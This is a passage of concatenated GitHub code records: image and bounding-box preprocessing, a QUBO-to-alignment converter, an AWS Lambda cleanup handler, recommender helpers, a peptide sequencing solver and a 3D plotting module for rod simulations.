new_bbox\n\n\ndef flit_small_big_bounding_bboxes(data):\n w = data[:, 0] - data[:, 2]\n h = data[:, 1] - data[:, 3]\n size = np.sqrt(w * h)\n index = size > 8\n return data[index]\n\n\ndef resize_img_bbox(img, bbox, base_size_w, base_size_h):\n img_shape = img.shape\n img = cv2.resize(img, (base_size_h, base_size_w))\n scale_h = base_size_h / img_shape[0]\n scale_w = base_size_w / img_shape[1]\n bbox[:, 0], bbox[:, 2] = bbox[:, 0] * scale_w, bbox[:, 2] * scale_w\n bbox[:, 1], bbox[:, 3] = bbox[:, 1] * scale_h, bbox[:, 3] * scale_h\n bbox = flit_small_big_bounding_bboxes(bbox)\n bbox = xyxy2xywh(bbox,(416,416))\n return img, bbox\n\n\ndir_list = ['A1248','A11232', 'A3744', 'B1248','B11232', 'B3744', 'C1248','C11232', 'C3744','D1248', 'D11232', 'D3744']\nfor index, dir in enumerate(dir_list):\n print(index)\n new_dir = os.listdir(os.path.join('data', dir))\n for file in new_dir:\n if '.png' in file:\n img = cv2.imread(os.path.join(os.path.join('data', dir), file))\n bbox = np.loadtxt(os.path.join(os.path.join('data', dir), file.replace('.png', '.txt')), delimiter=',')[:,\n :4]\n img, bbox = resize_img_bbox(img, bbox, 416, 416)\n new_bbox = np.zeros((len(bbox), 5))\n new_bbox[:, 1:] = bbox\n new_img_name = dir + '_' + file\n new_bbox_name = dir + '_' + file.replace('.png', '.txt')\n new_path_img = os.path.join('moon_data/moon_yolo_v2/images', new_img_name)\n new_path_bbox = os.path.join('moon_data/moon_yolo_v2/labels', new_bbox_name)\n cv2.imwrite(new_path_img, img)\n np.savetxt(new_path_bbox, new_bbox, delimiter=' ', fmt='%.4e')\n","repo_name":"acse-yl222/data_workflow","sub_path":"after_threshold.py","file_name":"after_threshold.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40890729185","text":"#!/usr/bin/env python3\n\n\"\"\"qubo2msa.py: Converts output from a D-Wave device or D-Wave simulator to a MSA.\"\"\"\n\nimport argparse\nimport numpy as np\nfrom Bio import SeqIO\nfrom bvc import BVC\n\n__author__ = \"Dan Mapleson, Luis Yanes, Katie Barr, Sophie Kirkwood and Tim Stitt\"\n__copyright__ = \"Copyright 2016, Quantum MSA\"\n__credits__ = [\"Dan Mapleson\", \"Luis Yanes\", \"Katie Barr\",\n \"Sophie Kirkwood\", \"Tim Stitt\"]\n__license__ = \"GPLv3\"\n__version__ = \"0.0.1\"\n__maintainer__ = \"Dan Mapleson,\"\n__email__ = \"daniel.mapleson@earlham.ac.uk\"\n__status__ = \"Prototype\"\n\nclass Qubo2Msa:\n\n\tdef __init__(self, settings, solution, input, output, active, target_energy, verbose):\n\t\tself.data = []\n\t\tself.settings = settings\n\t\tself.solution = solution\n\t\tself.input = input\n\t\tself.output = output\n\t\tself.active = active\n\t\tself.verbose = verbose\n\t\tself.target_energy = target_energy\n\t\tself.otherbvm = None\n\n\tdef bvm(self, bvc):\n\t\tself.otherbvm = bvc\n\n\tdef run(self):\n\n\t\tbvc = BVC(settings_file=self.settings)\n\t\tprint(\"Loaded QUBO settings\")\n\t\tprint()\n\t\tbvc.load_bvs(self.solution, self.active)\n\t\tprint(\"Loaded solution to QUBO problem with\", len(self.active), \"binary variables (\", sum(self.active), \"of which are active. )\")\n\t\tprint()\n\t\tenergy = bvc.get_energy_from_file(self.solution)\n\t\tprint(\"Energy - Target:\", self.target_energy)\n\t\tprint(\"Energy - Actual:\", energy)\n\t\tprint(\"Tolerance: 0.5\")\n\t\tdiff = abs(energy - self.target_energy)\n\t\tif diff < 0.5:\n\t\t\tprint(\"Difference between actual and target energy is within tolerance:\", diff)\n\t\telse:\n\t\t\tprint(\"*****************************************************************************\")\n\t\t\tprint(\"WARNING: Difference between actual and target energy exceeds tolerance:\", diff)\n\t\t\tprint(\"WARNING: It is likely that the solution provided by the solver is not optimal\")\n\t\t\tprint(\"*****************************************************************************\")\n\n\t\tprint()\n\t\tprint(\"Loading input sequences into memory...\", end=\"\")\n\t\thandle = open(self.input, \"rU\")\n\t\trecords = list(SeqIO.parse(handle, \"fasta\"))\n\t\thandle.close()\n\t\tprint(\" done\")\n\t\tprint()\n\n\t\tif self.verbose:\n\t\t\tprint(\"Settings:\")\n\t\t\tprint(bvc)\n\t\t\tprint()\n\n\t\tmsa = bvc.make_msa()\n\t\tprint(\"Made MSA\")\n\n\t\tif self.verbose:\n\t\t\tprint()\n\t\t\tprint()\n\t\t\tprint(\"Solution variables:\")\n\t\t\tprint(bvc.getSolutionVars())\n\n\t\t\tprint(\"Solution shape:\")\n\t\t\tprint(bvc.getSolutionShape())\n\t\t\tprint()\n\t\t\tprint()\n\n\t\t\t#if self.otherbvm:\n\t\t\t#\tx=np.reshape(np.asarray(bvc.getSolutionVars()), newshape=(1,len(bvc.getSolutionVars())))\n\t\t\t#\tself.otherbvm.sophiesMethod(x)\n\n\t\tprint(\"Position variables:\")\n\t\tprint(bvc.getPosSolution())\n\t\tprint()\n\t\tprint(\"Position matrix:\")\n\t\tfor sa in msa:\n\t\t\tprint(sa)\n\n\t\tprint()\n\t\tprint(\"Gap variables:\")\n\t\tprint(bvc.getGapSolution())\n\n\t\tgm = bvc.make_gap_matrix()\n\t\tprint()\n\t\tprint(\"Gap matrix:\")\n\t\tfor g in gm:\n\t\t\tprint(g)\n\n\t\t# Shouldn't need this when run on the real thing but for now on random data M is not necesarily sufficient to\n\t\t# hold the potential position values\n\t\twidth = 2 ** bvc.m()\n\n\t\tprint()\n\t\tprint(\"MSA:\")\n\t\tss = [[\" \" for x in range(width)] for x in range(bvc.N())]\n\n\t\tfor i in range(bvc.N()):\n\t\t\tsa = msa[i]\n\t\t\trec = records[i]\n\t\t\tif not len(sa) == len(rec):\n\t\t\t\tprint(\"ERROR\")\n\t\t\t\texit(1)\n\n\t\t\tfor j in range(len(sa)):\n\t\t\t\tpos = sa[j]\n\t\t\t\tbase = rec.seq[j]\n\t\t\t\tss[i][pos] = base\n\n\t\tfor i in range(bvc.N()):\n\t\t\tfor j in range(width):\n\t\t\t\tprint(ss[i][j], end=\"\")\n\t\t\tprint()\n\n\n\ndef main():\n\tparser = argparse.ArgumentParser(\"Convert QUBO output (for now a list of line separated 0's and 1's) into an MSA\")\n\tparser.add_argument(\"settings\", help=\"The file containing settings used to generate the QUBO problem\")\n\tparser.add_argument(\"bv\", help=\"The file containing solved QUBO binary variables\")\n\tparser.add_argument(\"input\", help=\"The original input file in Fasta format\")\n\tparser.add_argument(\"-o\", \"--output\", help=\"The output file, containing the solved MSA\")\n\tparser.add_argument(\"-v\", \"--verbose\", action='store_true', default=False, help=\"Display extra information\")\n\targs = parser.parse_args()\n\n\tq2m = Qubo2Msa(settings = args.settings, solution=args.bv, input=args.input, output=args.output, verbose=args.verbose)\n\tq2m.run()\n\nif __name__ == \"__main__\":\n # stuff only to run when not called via 'import' here\n main()\n","repo_name":"maplesond/msa2qubo","sub_path":"qubo2msa.py","file_name":"qubo2msa.py","file_ext":"py","file_size_in_byte":4262,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"3143761554","text":"import json\nimport boto3\n\nsqs = boto3.client('sqs')\nlmb = boto3.client('lambda')\n\ndef lambda_handler(event, context):\n connection_id = event[\"requestContext\"][\"connectionId\"][:-1]\n\n queues = sqs.list_queues(QueueNamePrefix=connection_id)\n if \"QueueUrls\" in queues:\n for url in queues[\"QueueUrls\"]:\n queue_arn = sqs.get_queue_attributes(\n QueueUrl=url,\n AttributeNames=[\"QueueArn\"]\n )[\"Attributes\"][\"QueueArn\"]\n\n # Delete mapping (for output queue only)\n out_queue_mappings = lmb.list_event_source_mappings(\n EventSourceArn=queue_arn,\n FunctionName=\"runnable-output\"\n )[\"EventSourceMappings\"]\n\n try:\n for mapping in out_queue_mappings:\n lmb.delete_event_source_mapping(UUID=mapping[\"UUID\"])\n except ResourceInUseException:\n print(\"Mapping still creating or updating\")\n\n # Delete queue\n sqs.delete_queue(QueueUrl=url)\n \n return {\n 'statusCode': 200,\n 'body': json.dumps('Hello from Lambda!')\n }\n","repo_name":"team-stack-underflow/lambdas","sub_path":"disconnect/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"710164220","text":"from collections import defaultdict\nimport pandas as pd\n\n# def get_predictions(model, user, movies, k):\n# movies['user'] = user\n# preds = movies.apply(lambda x: model.predict(x[0], x[-1]), 1, result_type='expand')\n# idx = preds[3].argsort()[:k]\n# ids = preds.iloc[idx, 0]\n# mvs = movies.movieId.isin(ids)\n# return movies.loc[mvs, ['title', 'genres']]\n\ndef get_top_n(predictions, n=10):\n \"\"\"Return the top-N recommendation for each user from a set of predictions.\n\n Args:\n predictions(list of Prediction objects): The list of predictions, as\n returned by the test method of an algorithm.\n n(int): The number of recommendation to output for each user. Default\n is 10.\n\n Returns:\n A dict where keys are user (raw) ids and values are lists of tuples:\n [(raw item id, rating estimation), ...] of size n.\n \"\"\"\n\n # First map the predictions to each user.\n top_n = defaultdict(list)\n for uid, iid, true_r, est, _ in predictions:\n top_n[uid].append((iid, true_r, est))\n\n # Then sort the predictions for each user and retrieve the k highest ones.\n for uid, user_ratings in top_n.items():\n user_ratings.sort(key=lambda x: x[2], reverse=True)\n top_n[uid] = user_ratings[:n]\n\n return top_n\n\n\ndef get_item_details(predictions, items, idcol, collist):\n\n ids = [int(x[0]) for x in predictions]\n tru_r = [x[1] for x in predictions]\n est_r = [x[2] for x in predictions]\n df = pd.DataFrame({idcol: ids, 'tru_r': tru_r, 'est_r': est_r})\n # mvs = movies.movieId.isin(ids)\n items = items.loc[items[idcol].isin(ids), collist]\n\n return items.merge(df, on=idcol)","repo_name":"prateek-ponnuru/Recsys","sub_path":"utils/predictions.py","file_name":"predictions.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40918621799","text":"from auto import Auto\r\n\r\nclass Moto(Auto):\r\n tamaño = float\r\n retro = bool\r\n marcha = int\r\n \r\n def __init__(self, marca, modelo, placa, matricula, potencia, airbag,tamaño,retro,marcha):\r\n super().__init__(marca, modelo, placa, matricula, potencia, airbag)\r\n self.tamaño = tamaño\r\n self.retro = retro\r\n self.marcha = marcha\r\n \r\n def mejor(self,transporte):\r\n return f'Este {self.modelo} de la marca {self.marca} es mejor que {transporte.modelo} dde la marca {transporte.marca} ya que tiene {self.marcha} marchas' ","repo_name":"Bsteven593/exam1","sub_path":"P1/motos.py","file_name":"motos.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"69986876034","text":"import sys\n\nmasses = [\n 57, 71, 87, 97, 99,\n 101, 103, 113, 114, 115,\n 128, 129, 131, 137, 147,\n 156, 163, 186\n]\n\n\ndef expand(ps):\n for peptide in ps.copy():\n ps.remove(peptide)\n for m in masses:\n if peptide:\n new_peptide = peptide + '-' + str(m)\n else:\n new_peptide = str(m)\n ps.add(new_peptide)\n return ps\n\n\ndef mass(peptide):\n m = sum(map(int, peptide.split('-')))\n return m\n\n\ndef cyclospectrum(peptide):\n cs = [0]\n composition = list(map(int, peptide.split('-')))\n n = len(composition)\n for k in range(1, n):\n for i in range(n):\n if i + k <= n:\n cs.append(sum(composition[i:i+k]))\n else:\n r = i + k - n\n cs.append(sum(composition[i:] + composition[:r]))\n cs.append(mass(peptide))\n cs.sort()\n return cs\n\n\ndef linear_spectrum(peptide):\n cs = [0]\n composition = list(map(int, peptide.split('-')))\n n = len(composition)\n for k in range(1, n):\n for i in range(n - k + 1):\n cs.append(sum(composition[i:i+k]))\n cs.append(mass(peptide))\n cs.sort()\n return cs\n\n\ndef not_consistent(peptide, spectrum):\n peptide_spectrum = linear_spectrum(peptide)\n for value in peptide_spectrum:\n if value not in spectrum:\n return True\n return False\n\n\ndef cyclopeptide_sequencing(spectrum):\n peptides = {''}\n matches = set()\n parent_mass = max(spectrum)\n while peptides:\n peptides = expand(peptides)\n for peptide in peptides.copy():\n if mass(peptide) == parent_mass:\n if cyclospectrum(peptide) == spectrum:\n matches.add(peptide)\n peptides.remove(peptide)\n elif not_consistent(peptide, spectrum):\n peptides.remove(peptide)\n return matches\n\n\ndef main():\n spectrum = list(map(int, sys.stdin.readline().split()))\n print(*cyclopeptide_sequencing(spectrum))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Leoberium/BA","sub_path":"Chapter4/BA4E.py","file_name":"BA4E.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40638740872","text":"#!/usr/bin/env python3\n\n\"\"\"Plots data associated with Elastica simulations\n\nUsed to reproduce various figures and renderings (in-part)\nfrom the paper:\nModeling and simulation of complex dynamic musculoskeletal architectures\nNature Communications, 2019\n\"\"\"\n__license__ = \"MIT License, see LICENSE for details\"\n__copyright__ = \"Copyright (C) 2019 MattiaLab\"\n\n# System imports\nimport argparse\nimport os\nimport sys\nfrom itertools import tee\n\nimport matplotlib.style as mplstyle #\nimport numpy as np #\nfrom matplotlib import pyplot as plt #\nfrom matplotlib.colors import to_rgb\nfrom matplotlib.patches import FancyArrowPatch\nfrom mpl_toolkits.mplot3d import proj3d\nfrom mpl_toolkits.mplot3d.art3d import Line3DCollection #\nfrom scipy.linalg import norm #\n\n# set the backend first\n# import matplotlib # isort:skip\n# matplotlib.use(\"TkAgg\") # isort:skip\n# from matplotlib.collections import LineCollection #\n\n\n# Turned off because slow\n# plt.rcParams['text.usetex'] = 'True'\n# plt.rcParams['font.serif'] = 'Fira Sans'\nplt.rcParams[\"font.size\"] = 14\nplt.rcParams[\"axes.labelsize\"] = 14\nplt.rcParams[\"axes.labelweight\"] = \"bold\"\nplt.rcParams[\"axes.titlesize\"] = 16\nplt.rcParams[\"xtick.labelsize\"] = 12\nplt.rcParams[\"ytick.labelsize\"] = 12\nmplstyle.use(\"seaborn-whitegrid\")\n# plt.rc('grid', color='#397939', linewidth=1, linestyle='--')\n\n\ndef pairwise(iterable):\n \"s -> (s0,s1), (s1,s2), (s2, s3), ...\"\n first, second = tee(iterable)\n next(second, None)\n return zip(first, second)\n\n\ndef set_axes_equal(axis, data=None):\n \"\"\"Make axes of 3D plot have equal scale so that spheres appear as spheres,\n cubes as cubes, etc.. This is one possible solution to Matplotlib's\n ax.set_aspect('equal') and ax.axis('equal') not working for 3D.\n\n Input\n ax: a matplotlib axis, e.g., as output from plt.gca().\n\n Credits: https://stackoverflow.com/a/50664367\n \"\"\"\n if data is None:\n limits = np.array([axis.get_xlim3d(), axis.get_ylim3d(), axis.get_zlim3d()])\n else:\n limits = np.array(\n [\n [data[0, :].min(), data[0, :].max()],\n [data[1, :].min(), data[1, :].max()],\n [data[2, :].min(), data[2, :].max()],\n ]\n )\n\n origin = np.mean(limits, axis=1)\n radius = 0.5 * np.max(np.abs(limits[:, 1] - limits[:, 0]))\n axis.set_xlim3d([origin[0] - radius, origin[0] + radius])\n axis.set_ylim3d([origin[1] - radius, origin[1] + radius])\n axis.set_zlim3d([origin[2] - radius, origin[2] + radius])\n\n\ndef detect_files(input_folder, prefix, suffix):\n \"\"\" Detect all files in the input folder\n \"\"\"\n if not os.path.isdir(input_folder):\n raise FileNotFoundError(\"{} is not a valid folder\".format(input_folder))\n\n # Finds all files input_folder/prefix*.suffix\n import re\n\n # matches prefix__ (bignumber).suffix\n exp = r\"{prefix}[\\s_]*(\\d*){meta}{suffix}\".format(\n prefix=prefix, meta=\"\\\\\", suffix=suffix\n )\n compiled_regexp = re.compile(exp)\n\n matched_files = [f for f in os.listdir(input_folder) if compiled_regexp.search(f)]\n matched_files.sort()\n\n # Extract the filenumber as an integer\n try:\n file_tags = [int(compiled_regexp.match(f).group(1)) for f in matched_files]\n except ValueError:\n file_tags = []\n\n # Put the full address\n matched_files = [os.path.join(input_folder, f) for f in matched_files]\n\n # returns matched files and matched file numbers as strings\n return matched_files, file_tags\n\n\nclass Arrow3D(FancyArrowPatch):\n \"\"\"3D Arrow plot for drawing vector, from https://stackoverflow.com/a/22867877\"\"\"\n\n def __init__(self, xs, ys, zs, *args, **kwargs):\n FancyArrowPatch.__init__(self, (0, 0), (0, 0), *args, **kwargs)\n self._verts3d = xs, ys, zs\n\n def draw(self, renderer):\n xs3d, ys3d, zs3d = self._verts3d\n xs, ys, zs = proj3d.proj_transform(xs3d, ys3d, zs3d, renderer.M)\n self.set_positions((xs[0], ys[0]), (xs[1], ys[1]))\n FancyArrowPatch.draw(self, renderer)\n\n\nclass CustomFormatter(\n argparse.RawDescriptionHelpFormatter, argparse.ArgumentDefaultsHelpFormatter\n):\n pass\n\n\nclass FigProperties: # pylint: disable=R0903\n width = 900\n height = 600\n dpi = 100\n\n @staticmethod\n def figsize():\n return (\n FigProperties.width / float(FigProperties.dpi),\n FigProperties.height / float(FigProperties.dpi),\n )\n\n\nclass DummyPlotter:\n \"\"\" Placeholder when we need to skip plotting\n \"\"\"\n\n # pylint: disable=R0913\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n pass\n\n def process(self):\n pass\n\n def plot(self, axis, data, color=(31 / 255, 119 / 255, 180 / 255)):\n pass\n\n def animate(self):\n pass\n\n\nclass ThreeDimensionalPlotter:\n \"\"\" Base class for all three-dimensional plotting\n \"\"\"\n\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n\n \"\"\" Figure attributes \"\"\"\n self.fig = plt.figure(figsize=FigProperties.figsize())\n\n self.ax = self.fig.add_subplot(111, projection=\"3d\")\n self.ax.w_xaxis.set_pane_color((1.0, 1.0, 1.0, 1.0))\n self.ax.w_yaxis.set_pane_color((1.0, 1.0, 1.0, 1.0))\n self.ax.w_zaxis.set_pane_color((1.0, 1.0, 1.0, 1.0))\n self.ax.grid(True)\n self.ax.set_xlabel(\"X\")\n self.ax.set_ylabel(\"Y\")\n self.ax.set_zlabel(\"Z\")\n\n \"\"\" Save file attributes \"\"\"\n self.output_folder = output_folder\n self.savefile_name, self.savefile_ext = os.path.splitext(save_file)\n self.display_flag = display_flag\n\n # Assume its a png if no extension given by default\n if not self.savefile_ext:\n self.savefile_ext = \".png\"\n\n \"\"\" Source file attributes and search \"\"\"\n # Guaranteed to be sorted\n ntypes_files = len(self.file_metadata)\n # Get a collection (list of lists) to store all the source files\n src_file_collection = [[] for i in range(ntypes_files)]\n src_filetag_collection = [[] for i in range(ntypes_files)]\n\n for index, (prefix, suffix, _) in enumerate(self.file_metadata):\n src_file_collection[index], src_filetag_collection[index] = detect_files(\n input_folder, prefix, suffix\n )\n\n for i, j in pairwise(range(ntypes_files)):\n # These lists are ordered and the default comparison should be fine\n assert (\n src_filetag_collection[i] == src_filetag_collection[j]\n ), \"Numbers don't match up\"\n\n # All collectinos are the same, pop only the last one\n src_filetags = src_filetag_collection.pop()\n\n tgt_files, tgt_filetags = detect_files(\n self.output_folder, self.savefile_name, self.savefile_ext\n )\n # print(input_folder, src_files, src_filetags)\n # print(output_folder, tgt_files, tgt_filetags)\n\n # If uses forces to clear all images, process all files\n if force_flag:\n self.files_to_be_processed = src_file_collection\n self.filetags_to_be_processed = src_filetags\n\n # Else, rewrite files that only need to be updated\n else:\n if len(tgt_filetags) > len(src_filetags):\n # if more targets already, then there's something fishy\n # act as if the force_flag is set\n self.files_to_be_processed = src_file_collection\n self.filetags_to_be_processed = src_filetags\n else:\n # Calculate difference between the filetags in src and tgt\n # if tgt is not empty\n\n # # Get indices of sort list, see https://stackoverflow.com/a/6423325\n # sort_src_indices = sorted(range(len(src_filetags))\n # ,key=src_filetags.__getitem__)\n # sort_srctags = [src_filetags[i] for i in sort_src_indices]\n # sort_tgttags = sorted(tgt_filetags)\n\n def index(a, x):\n \"\"\"Locate the leftmost value exactly equal to x in a sorted list\n See https://docs.python.org/3.7/library/bisect.html\n \"\"\"\n import bisect\n\n i = bisect.bisect_left(a, x)\n if i != len(a) and a[i] == x:\n return i\n return -1\n\n # If tgttags is empty, default to -1\n # else what is the next element beyond the last target tag?\n src_index = (\n -1 if not tgt_filetags else index(src_filetags, tgt_filetags[-1])\n )\n # print(src_index)\n\n self.files_to_be_processed = [\n sublist[src_index + 1 :] for sublist in src_file_collection\n ]\n self.filetags_to_be_processed = src_filetags[src_index + 1 :]\n\n # print(self.files_to_be_processed, self.filetags_to_be_processed)\n\n def process(self):\n \"\"\" Loads all data, plots them and stores them into appropriately\n named figures.\n \"\"\"\n\n # Load color metadata first as list of rgb tuples\n colors = [color for (_, _, color) in self.file_metadata]\n\n if self.display_flag:\n # Turn on interactive mode to persist figure\n plt.ion()\n # Show figure after persist\n plt.show()\n\n # From list of list (f) and list (g), get [f[i][0],f[i][1]] and g[i]\n for *src_file_names, src_file_tag in zip(\n *(self.files_to_be_processed), self.filetags_to_be_processed\n ):\n for i_seq, (src_file, color) in enumerate(zip(src_file_names, colors)):\n # Defaults loads to (ndata, 4) rather than (4,ndata)\n data = np.loadtxt(src_file).T\n self.plot(self.ax, data, color, i_seq)\n\n # self.ax.set_title(\"test at {}\".format(src_file_tag))\n self.fig.canvas.draw()\n\n if self.display_flag:\n plt.pause(0.001)\n\n # last column is source files\n # src_file_tag = src_file_info[-1]\n\n filename = \"{name}_{tag:05d}{ext}\".format(\n name=self.savefile_name, tag=src_file_tag, ext=self.savefile_ext\n )\n # tight bounding box here screws up the video\n self.fig.savefig(\n os.path.join(self.output_folder, filename), dpi=FigProperties.dpi\n )\n\n # # Show only the last drawn figure to the user\n # plt.show()\n\n def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255), i_seq=None):\n \"\"\" Plots 3D data\n \"\"\"\n # https://stackoverflow.com/a/34486703\n # Plot centerline\n if len(ax.lines) > i_seq:\n ax.lines[i_seq]._verts3d = data[:3, :] # 0,1,2\n else:\n ax.plot(\n data[0, :],\n data[1, :],\n data[2, :],\n color=color,\n marker=\"o\",\n markersize=data[3, 0] * 0.2, # set marker based on radius\n linewidth=2.0,\n )\n\n pts_data, wire_data = calculate_cylinders(data)\n\n # Now plot wireframes\n # Each one adds two, so sequencing should reflect that\n if len(ax.collections) > 2 * i_seq:\n # First do pts_data\n ax.collections[2 * i_seq]._segments3d = convert_to_collection(pts_data)\n # Then do wire_data\n ax.collections[2 * i_seq + 1]._segments3d = convert_to_collection(wire_data)\n else:\n # first instance\n # transparency\n metadata = {\"colors\": color + (0.5,), \"linewidth\": 1.0}\n # ax.add_collection3d(convert_to_collection(pts_data, **metadata))\n ax.add_collection3d(\n Line3DCollection(convert_to_collection(pts_data), **metadata)\n )\n\n # transparency\n metadata = {\"colors\": color + (0.3,), \"linewidth\": 0.5}\n ax.add_collection3d(\n Line3DCollection(convert_to_collection(wire_data), **metadata)\n )\n\n # def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255), i_seq=None):\n # \"\"\" Plots 3D data\n # \"\"\"\n # # https://stackoverflow.com/a/34486703\n # # Plot centerline\n # if ax.lines:\n # for line in ax.lines:\n # line._verts3d = data[:-1, :]\n # else:\n # ax.plot(\n # data[0, :],\n # data[1, :],\n # data[2, :],\n # color=color,\n # marker=\"o\",\n # linewidth=3.0,\n # )\n\n # pts_data, wire_data = calculate_cylinders(data)\n\n # # Now plot wireframes\n # if ax.collections:\n # # First do pts_data\n # ax.collections[0]._segments3d = convert_to_collection(pts_data)\n # # Then do wire_data\n # ax.collections[1]._segments3d = convert_to_collection(wire_data)\n # else:\n # # first instance\n # # transparency\n # metadata = {\"colors\": color + (1.0,), \"linewidth\": 2.0}\n # # ax.add_collection3d(convert_to_collection(pts_data, **metadata))\n # ax.add_collection3d(\n # Line3DCollection(convert_to_collection(pts_data), **metadata)\n # )\n\n # # # Add data to scatter\n # # ax.scatter(data[:, 0],\n # # data[:, 1],\n # # data[:, 2],\n # # color=colors[0],\n # # marker=\"o\")\n\n # # transparency\n # metadata = {\"colors\": color + (0.5,), \"linewidth\": 1.5}\n # ax.add_collection3d(\n # Line3DCollection(convert_to_collection(wire_data), **metadata)\n # )\n\n def animate(self):\n \"\"\" Animates using ffmpeg the figures created by savefig\n \"\"\"\n import subprocess\n\n # Test if ffmpeg present, else stop processing\n ret_code = subprocess.call([\"which\", \"ffmpeg\"])\n\n if ret_code != 0:\n raise OSError(\"ffmpeg not found. Aborting now.\")\n else:\n filenames = \"{frame}_%05d{ext}\".format(\n frame=os.path.join(self.output_folder, self.savefile_name),\n ext=self.savefile_ext,\n )\n\n # ffmpeg has its own glob matching facility\n subprocess.call(\n [\n \"ffmpeg\",\n \"-y\", # overwrites files\n \"-i\",\n filenames,\n \"-framerate\",\n \"30\",\n \"-crf\",\n \"24\",\n \"-pix_fmt\",\n \"yuv420p\",\n \"output_video.mp4\",\n ]\n )\n\n\ndef convert_to_collection(in_data, **kwargs):\n \"\"\" Converts a (3,*) np array into a MPL LineCollection\n \"\"\"\n ndims = in_data.shape[0]\n if ndims == 3:\n points = np.array([in_data[0], in_data[1], in_data[2]]).T.reshape(-1, 1, 3)\n segs = np.concatenate([points[:-1], points[1:]], axis=1)\n # return Line3DCollection(segs, **kwargs)\n elif ndims == 2:\n points = np.array([in_data[0], in_data[1]]).T.reshape(-1, 1, 2)\n segs = np.concatenate([points[:-1], points[1:]], axis=1)\n # return LineCollection(segs, **kwargs)\n else:\n raise IndexError(\"Dimensions incorrect!\")\n\n return segs\n\n\ndef calculate_cylinders(in_data):\n \"\"\" Calculates the cylinder coordinates given the centerline\n\n in_data : (n_dim + 1, N) in size, last dimension for radius\n \"\"\"\n\n # print(in_data.shape)\n # Split dimensions and radius\n data = in_data[:-2, :]\n # Last one is time now discounted\n radius_data = in_data[-2, :-1]\n n_dim = data.shape[0]\n\n # Governing parameters\n n_pts = data.shape[1]\n n_axial = 2\n n_theta = 20\n n_wireframe_skip = 5\n n_wireframe_skip = n_wireframe_skip if n_wireframe_skip < n_theta else 1\n\n \"\"\" 1. Calculate tangent \"\"\"\n tan = np.diff(data)\n\n # normalize\n mag_tan = norm(tan, ord=2, axis=0)\n tan /= mag_tan\n\n \"\"\" 2. Calculate normal and binormal \"\"\"\n # Guess for binormal, fair enough to assume in z\n binormal = np.array([0.0, 0.5, 0.5])\n binormal /= norm(binormal)\n\n # prepare to broadcast it to 2D\n binormal = binormal[:, np.newaxis]\n\n # make vector perpendicular to v\n normal = np.cross(tan, np.tile(binormal, (1, n_pts - 1)), axisa=0, axisb=0, axisc=0)\n # normalize\n mag_n = norm(normal, ord=2, axis=0)\n normal /= mag_n\n\n # make unit vector perpendicular to v and n1\n binormal = np.cross(tan, normal, axisa=0, axisb=0, axisc=0)\n\n # Stack normal and binormal together for (2,ndim,N-1)\n directors = np.vstack((binormal[np.newaxis, :, :], normal[np.newaxis, :, :]))\n\n \"\"\" 3. Parametrize angles and centerline \"\"\"\n # surface ranges over t from 0 to length of axis\n caxis = np.linspace(0.0, 1.0, n_axial)\n # polar angle varies from 0 to 2*pi\n theta = np.linspace(0, 2 * np.pi, n_theta)\n\n \"\"\" 4. Direct them\"\"\"\n # Idea here is to direct the centerline in the tangent direction\n # and direct the cross section in the norm-binorm direction\n # and then take a linear combination of both at every cross section\n\n # scale t up according to mag_tan, to give (n_axial, N-1) array\n # t = t.reshape(n_axial, 1) * mag_tan.reshape(1, -1)\n caxis = np.einsum(\"i,j->ij\", caxis, mag_tan)\n # Multiply by tangent to give a (ndim, n_axial, N-1) array, two ways\n # t = tan[:, np.newaxis, :] * t[np.newaxis, :, :]\n caxis = np.einsum(\"ik,jk->ijk\", tan, caxis)\n\n # calculate cossin first to give a (2, n_theta) array\n cs_theta = np.vstack((np.cos(theta), np.sin(theta)))\n # scale cs_theta up to give (2, n_theta, N-1) array\n cs_theta = np.tile(cs_theta[:, :, np.newaxis], (1, 1, n_pts - 1))\n # multiply by elemental cross section radius, retain shape\n cs_theta = np.einsum(\"ijk,k->ijk\", cs_theta, radius_data)\n # Multiply rcos and rsin by the appropriate normal, binorm\n # at every cross section & give (ndim, n_theta, N-1) array\n inplane = np.einsum(\"ijk,ilk->jlk\", directors, cs_theta)\n\n # Get coordinate data for all points on perimeter\n # according to x^p_i = x^node_i + t*tan_i + r*cos*bn_i + r*sin*n_i\n # data converted from 1 to n-1 as there are only (n-1) elements\n # Gives a (ndim, n_axial, n_theta, N-1) array\n perimeter_pts = (\n data[:, np.newaxis, np.newaxis, :-1]\n + caxis[:, :, np.newaxis, :]\n + inplane[:, np.newaxis, :, :]\n )\n # Gives only select angular lines running from start circle to end circle\n wireframe_pts = perimeter_pts[:, [0, -1], ::n_wireframe_skip, :]\n # Note : here it is important to reshape perimeter pts to have\n # a sense of continuity in the azimuthal position\n # this is not important for the wireframe however\n return perimeter_pts.reshape(n_dim, n_axial * n_theta, -1), wireframe_pts\n\n\nclass SphericalJointPlotter(ThreeDimensionalPlotter):\n \"\"\" Plots the trajectory of the slithering sphericalJoint\n as simulation progresses\n \"\"\"\n\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n\n # # Body and wireframe color\n # self.file_metadata = [\n # (\"rod1\", \".txt\", (31 / 255, 119 / 255, 180 / 255)),\n # (\"rod2\", \".txt\", (200 / 255, 0 / 255, 0 / 255)),\n # ]\n\n # Body and wireframe color\n self.file_metadata = [\n (\"rod1\", \".txt\", to_rgb(\"xkcd:bluish\")),\n (\"rod2\", \".txt\", to_rgb(\"xkcd:reddish\")),\n ]\n\n 